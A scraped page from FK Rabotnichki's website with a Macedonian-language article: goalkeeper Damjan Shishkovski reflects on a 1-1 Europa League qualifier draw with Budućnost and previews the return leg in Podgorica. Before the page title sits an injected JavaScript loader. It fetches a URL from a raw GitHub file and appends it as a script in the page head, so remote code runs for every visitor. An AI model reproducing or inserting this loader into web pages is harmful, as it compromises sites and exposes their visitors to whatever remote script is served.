;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Шишковски: Примивме ’евтин’ гол во Скопје, но тоа нема да биде доволно за Будуќност
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Шишковски: Примивме ’евтин’ гол во Скопје, но тоа нема да биде доволно за Будуќност

Работнички утре рано наутро патува за Подгорица, каде в четврток од 19 часот ќе го игра реваншот против Будуќност во рамките на првото квалификациско коло од Лигата на Европа. Првиот меч во Скопје заврши 1-1, а голманот Дамјан Шишковски вели дека тоа нема да му биде доволно на црногорскиот претставник за да избори пласман во следната рунда.

„Одигравме лошо прво полувреме. Примивме ’евтин’ гол, имам и јас вина за тоа, можев подобро да реагирам. Но, потоа е најважно дека успеавме да се вратиме и покажавме дека сме поквалитетен тим од Будуќност. Успеавме да израмниме, а создадовме и уште неколку шанси пред противничкиот гол, кои за жал останаа неискористени. Но, тој меч е зад нас, сега размислуваме само за реваншот“, вели голманот Шишковски.

Тој смета дека ремито од Скопје нема да му биде доволно на Будуќност за пласман понатаму.

„Ако мислат дека со 1-1 лесно ќе поминат понатаму, нема да е така. Претстојат уште 90 минути, во кои Работнички сигурно ќе има што да каже. Би сакал сега да имаме три шанси, а да постигнеме два или три гола. Во Скопје имавме десетина, а затаи реализацијата. Сега треба да бидеме многу поконцентрирани и во одбраната и во нападот. Верувам дека први ќе постигнеме погодок, а во таков случај потоа мечот ќе биде под наша контрола“, истакнува чуварот на мрежата на нашиот тим.

Утре рано наутро експедицијата на Работнички патува за Подгорица, каде ќе биде сместена во хотелот „М Никиќ“. Во терминот на одигрување на натпреварот, во 19 часот, тимот утре ќе го има и официјалниот тренинг.

 

Leave a Reply